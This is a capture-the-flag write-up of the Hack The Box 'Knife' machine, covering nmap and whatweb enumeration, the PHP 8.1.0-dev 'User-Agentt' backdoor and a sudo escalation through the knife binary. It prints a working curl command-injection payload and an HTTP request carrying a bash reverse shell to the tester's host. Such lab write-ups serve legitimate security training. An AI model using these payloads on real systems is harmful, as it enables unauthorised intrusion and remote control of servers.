Summary
Knife is an extremely easy box that really shows the range of difficulties which can be within the "easy" band of Hack the box difficulties. This box catered to beginners and the experienced as you could simply copy and paste CVE scripts for your initial foothold, or try custom crafting the syntax yourself to make the exploit work for your initial foothold.
Tools used
Autorecon
Linpeas
Whatweb
Processes/Techniques
Webshell hijacking
Command injection to code execution
Linpeas privilege's enumeration
SETUID
References
Enumeration
As usual we start off with a basic Nmap scan to see what we are working with, and initially our attack vector looks fairly narrow. As a result we will do a second stage scan to enumerate version information, with assistance from the nmap .NSE engine by using the following flags.
-sC - use default enumeration scripts
-sV - version enumeration
Our more in-depth nmap scan shows the expected ssh service followed by our HTTP website that is identified with the title "Emergent Medical Idea", this is fantastic information.
I noticed that port 1839 did not show up on the in-depth scan
Using a targeted scan by specifying port '1839' while calling the flag -Pn to disable the ICMP flag incase our firewall has a threshold trigger, that when combined with the nmap scripting engine, creates to much traffic. This however is not the case, and we do not get any further information.
Enumeration AutoRecon
As always, I like to start AutoRecon in the background after my initial enumeration to pickup any bits and pieces I may of left behind. This can sometimes take up to 30 minutes so we will check back later.
Enumeration HTTP
Upon browsing to port 80 we can see that this website is likely attributed to the medical field.
Directory Buster
I start off with running a directory buster in the background to look for any hidden directories while I invest time actively enumerating this website. But unfortunately hidden directory results in nothing.
I was not able to click any of the sub menus in the upper right corner which was quite weird and suggestive that perhaps the page was still under development.
Page inspection
I proceeded to check the page contents and other than some basic scripts and formatting there was nothing interesting.
Auto Recon
Let's check back on AutoRecon and see if anything was picked up over port 80 that I perhaps missed with only a surface level scan.
Browsing into the AutoRecon scans directory shows us many reports that we can view and we will go straight to the whatweb results. If you don't already know, whatweb is a very powerful tool for website enumeration. The results are listed below.
WhatWeb report for http://10.129.216.29:80
Status : 200 OK
Title : Emergent Medical Idea
IP : 10.129.216.29
Country : RESERVED, ZZ
Summary : PHP[8.1.0-dev], Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 8.1.0-dev
Google Dorks: (2)
Website : http://www.php.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/8.1.0-dev (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 01:58:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2406
Connection: close
Content-Type: text/html; charset=UTF-8
Reviewing the output shows us that PHP is used in the development of the website and in particular version 8.1.0-dev. So lets take a look at this as I believe it is an older version we see here.
Enumeration - PHP version 8.1.0-dev
I came across a popular exploit that was found on exploit DB. This is not straight forward and involves researching the exploit and tampering around with the user agent field.
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
Here we enumerate through exploit DB and the packet storm exploits and after trying to manually execute system commands through the user agent we resort to trying the curl command.
CVE - Exploit DB -
https://www.exploit-db.com/exploits/49933
CVE - PacketStorm
https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
Code injection - curl
Eventually we solve this with the curl command.
curl -i -H "User-Agentt: zerodiumsystem('id');" http://10.129.225.112/AAAA.php
Backdoor - Burpsuite
We also solve this by tinkering around with the syntax in burpsuite. Which eventually works and provide the callback to our listener.
GET /aaa.php HTTP/1.1
Host: 10.129.225.112
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.44/6363 0>&1'");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Our netcat listener catches the reverse shell.
Root
I am largely in the habit of uploading privilege enumeration scripts such as linpeas however I always check for low hanging fruit in the users directory. Running a "sudo -l" command we actually see a result which is likely the path to root.
Sudo -l
Knife enumeration and GTFO bins
After tampering around with the knife binary, and failing to inject code, abuse the symbolic link, I eventually looked it up on GTFO bins where I found sudo abuse and we made our way to root.
https://gtfobins.github.io/gtfobins/knife/
Root
Comments